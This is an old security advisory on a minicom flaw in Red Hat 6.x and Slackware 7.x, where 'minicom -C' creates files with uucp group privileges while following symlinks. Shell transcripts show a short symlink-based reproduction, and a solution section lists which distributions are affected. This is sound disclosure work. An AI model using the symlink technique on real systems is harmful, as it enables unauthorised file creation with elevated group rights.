COMMAND
minicom
SYSTEMS AFFECTED
RH 6.1 / 6.2
PROBLEM
Michal Zalewski found following. On RedHat 6.1 and RedHat 6.2
boxes:
@(#)Minicom V1.83.0 (compiled Mar 7 2000)(c) Miquel van Smoorenburg
[lcamtuf@nimue lcamtuf]$ minicom -C foo
minicom: there is no global configuration file /etc/minirc.dfl
Ask your sysadm to create one (with minicom -s).
[lcamtuf@nimue lcamtuf]$ ls -l foo
-rw-rw-r-- 1 lcamtuf uucp 0 Aug 18 12:21 foo
^^ ^^^^
Any file can be created anywhere with uucp privledges - it will
follow symlinks. Not nice on systems running uucp services.
And the confirmation on Slackware 7.x using minicom 1.82 and
1.82.1...
Slackware 7.0
me@technolust> ln -s /tmp/foo .
me@technolust> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@technolust> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@technolust> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:49 /tmp/foo
Slackware 7.1
me@mos> ln -s /tmp/foo .
me@mos> ls -al /tmp/foo
ls: /tmp/foo: No such file or directory
me@mos> (umask 2; minicom -C foo)
minicom: cannot open /dev/ttyS1: Permission denied
me@mos> ls -al /tmp/foo
-rw-rw-r-- 1 me uucp 0 Aug 30 16:46 /tmp/foo
SOLUTION
Mandrake 7.1 did not do this.. On FreeBSD 4.1-STABLE, with
minicom 1.83.1, and the file "foo" were created with the correct
uid/gid, using the default umask.
SuSE ships version 1.81.1 since July 27 1998 (that's back to the
good old SuSE-5.3 times) until now with SuSE-7.0. minicom is
installed root.uucp 0755 in all versions.
`chmod 2755 /usr/bin/minicom' and `minicom -C foo' afterwards does
not exhibit any problem because no file is created. For a user
of a SuSE system to be able to use minicom (restricted by device
permissions), she must be added to group uucp.
Conectiva Linux is not affected by this.
Debian/GNU Linux does not install minicom set[ug]id, and is not
vulnerable... verified on 2.1 (slink), 2.2 (potato), and "woody".